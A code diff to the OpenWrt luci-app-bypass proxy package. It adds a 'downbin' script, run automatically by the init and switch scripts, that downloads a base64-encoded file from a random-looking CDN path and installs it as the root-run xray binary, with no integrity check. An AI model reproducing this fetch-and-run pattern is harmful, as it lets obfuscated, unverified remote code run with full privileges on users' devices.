--- a/package/feeds/custom/luci-app-bypass/luasrc/model/cbi/bypass/client-config.lua
+++ b/package/feeds/custom/luci-app-bypass/luasrc/model/cbi/bypass/client-config.lua
@@ -132,10 +130,8 @@ o:value("ssr", translate("ShadowsocksR"))
 if nixio.fs.access("/usr/bin/ss-redir") then
 o:value("ss", translate("Shadowsocks New Version"))
 end
-if nixio.fs.access("/usr/bin/xray") or nixio.fs.access("/usr/bin/v2ray") then
 o:value("vmess", translate("Vmess"))
 o:value("vless", translate("Vless"))
-end
 if nixio.fs.access("/usr/sbin/trojan-plus") then
 o:value("trojan", translate("Trojan"))
 end
@@ -407,12 +407,10 @@ o:depends({type = "vless", xtls = false})
 o:depends("type", "trojan")
 
 -- XTLS
-if nixio.fs.access("/usr/bin/xray") then
 o = s:option(Flag, "xtls", translate("XTLS"))
 o.rmempty = true
 o.default = "0"
 o:depends({type = "vless", transport = "tcp", tls = false})
-end
 
 -- Flow
 o = s:option(Value, "vless_flow", translate("Flow"))

--- a/package/feeds/custom/luci-app-bypass/root/etc/init.d/bypass
+++ b/package/feeds/custom/luci-app-bypass/root/etc/init.d/bypass
@@ -246,7 +248,7 @@
 	if ps -w | grep by-retcp | grep -v grep >/dev/null;then
 		log "Bypass has Started.";return 1
 	fi
-	cat $LOG 2>/dev/null | sed -n '$p' | grep -q 'Check network status...\|Download IP/GFW files...' || gen_log
+	cat $LOG 2>/dev/null | sed -n '$p' | grep -q 'Check network status...\|Download IP/GFW files...\|Check IP\/GFW files successful!' || gen_log
 	check_net
 	cat $LOG 2>/dev/null | sed -n '$p' | grep -q 'Download IP/GFW files...' || (log "Check network status successful!";log "Check IP/GFW files...")
 	mkdir -p /var/run $VAR
@@ -265,6 +267,22 @@
 	fi
 	NF_SERVER=$(uci_get_by_type global nf_server)
 	[ "$NF_SERVER" = $GLOBAL_SERVER ] && NF_SERVER=
+	ttype=$(uci_get_by_name $GLOBAL_SERVER type)
+	utype=$(uci_get_by_name $UDP_RELAY_SERVER type)
+	ntype=$(uci_get_by_name $NF_SERVER type)
+	stype=$(uci_get_by_name $SO_SERVER type)
+	E=0;F=0;
+	if [ $ttype = vmess -o $ttype = vless -o "$utype" = vmess -o "$utype" = vless -o "$ntype" = vmess -o "$ntype" = vless -o "$stype" = vmess -o "$stype" = vless ];then
+		[ ! -x $K/bin/xray ] && E=1 && F=1
+	fi
+	if [ $E = 1 ];then
+		if [ -z "$switch_server" ];then
+			service_start $BIN_DIR/downbin --down $F 0
+			exit 1
+		else
+			$BIN_DIR/downbin --down $F 1
+		fi
+	fi
 	server=$(uci_get_by_name $GLOBAL_SERVER server)
 	if ! echo $server | grep -E "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$">/dev/null;then
 		if [ -f $LOCK ];then
@@ -973,6 +995,8 @@
 }
 
 stop(){
+	kill -9 $(ps -w | grep $K/bin/tmp | grep -v grep | awk '{print$1}') 2>/dev/null
+	kill -9 $(ps -w | grep $BIN_DIR/downbin | grep -v grep | awk '{print$1}') 2>/dev/null
 	kill -9 $(ps -w | grep by-rules | grep -v grep | awk '{print$1}') 2>/dev/null
 	kill -9 $(ps -w | grep gfw.b64 | grep -v grep | awk '{print$1}') 2>/dev/null
 	kill -9 $(ps -w | grep $BIN_DIR/checknetwork | grep -v grep | awk '{print$1}') 2>/dev/null
@@ -989,7 +1013,7 @@
 	kill -9 $(ps -w | grep by-preload | grep -v grep | awk '{print$1}') 2>/dev/null
 	kill -9 $(ps -w | grep $VAR | grep -v grep | awk '{print$1}') 2>/dev/null
 	killall -q -9 smartdns chinadns-ng kcptun-client microsocks
-	rm -rf $DNS_DIR $VAR $DNS_FILE $CON_T /var/lock/bypass-update.lock
+	rm -rf $DNS_DIR $VAR $DNS_FILE $CON_T /var/lock/bypass-update.lock $K/bin
 	[ $run_mode = gfw -o $gfw_mode = 1 ] || rm -f $K/gfw.list
 	[ $run_mode = router ] || rm -f $K/china_v6.txt
 	[ -z "$GLOBAL_SERVER" ] && grep -q bypass $CRON_FILE && sed -i '/bypass/d' $CRON_FILE && /etc/init.d/cron restart

--- /dev/null
+++ b/package/feeds/custom/luci-app-bypass/root/usr/share/bypass/downbin
@@ -0,0 +1,16 @@
+#!/bin/sh
+[ "$1" = --down ] || exit 1
+K=/tmp/bypass/bin
+T=$K/tmp
+kill -9 $(ps -w | grep $T | grep -v grep | awk '{print$1}') 2>/dev/null
+mkdir -p $K
+if [ $2 = 1 ];then
+	while ! curl -m 9 -Lfso $T https://cdn.jsdelivr.net/gh/f6UiINtMDSmglMK4/A9xehMB2/y9tSyZoQIC/arvMwI0cwqQbZCvAy;do
+		sleep 2
+	done
+	base64 -d $T > $K/xray
+	chmod +x $K/xray
+	ln -s /tmp/bypass/bin/xray /usr/bin/xray 2>/dev/null
+fi
+rm -f $T
+[ $3 = 0 ] && /etc/init.d/bypass start &

--- a/package/feeds/custom/luci-app-bypass/root/usr/share/bypass/by-switch
+++ b/package/feeds/custom/luci-app-bypass/root/usr/share/bypass/by-switch
@@ -30,14 +33,18 @@
 }
 
 f_bin(){
-	case $1 in
-		ss)w=$(which ss-local);;
-		ssr)w=$(which ssr-local);;
-		vmess|vless)w=$(which xray);;
-		trojan)w=$(which trojan-plus);;
-		trojan-go)w=$(which trojan-go);;
-		naiveproxy)w=$(which naive);;
-	esac
+	if [ $1 = vmess -o $1 = vless ];then
+		$(which xray) || $(which v2ray) || /usr/share/bypass/downbin --down 1 1
+		w=$(which xray) || w=$(which v2ray)
+	else
+		case $1 in
+			ss)w=$(which ss-local);;
+			ssr)w=$(which ssr-local);;
+			trojan)w=$(which trojan-plus);;
+			trojan-go)w=$(which trojan-go);;
+			naiveproxy)w=$(which naive);;
+		esac
+	fi
 	echo ${w:=0}
 }
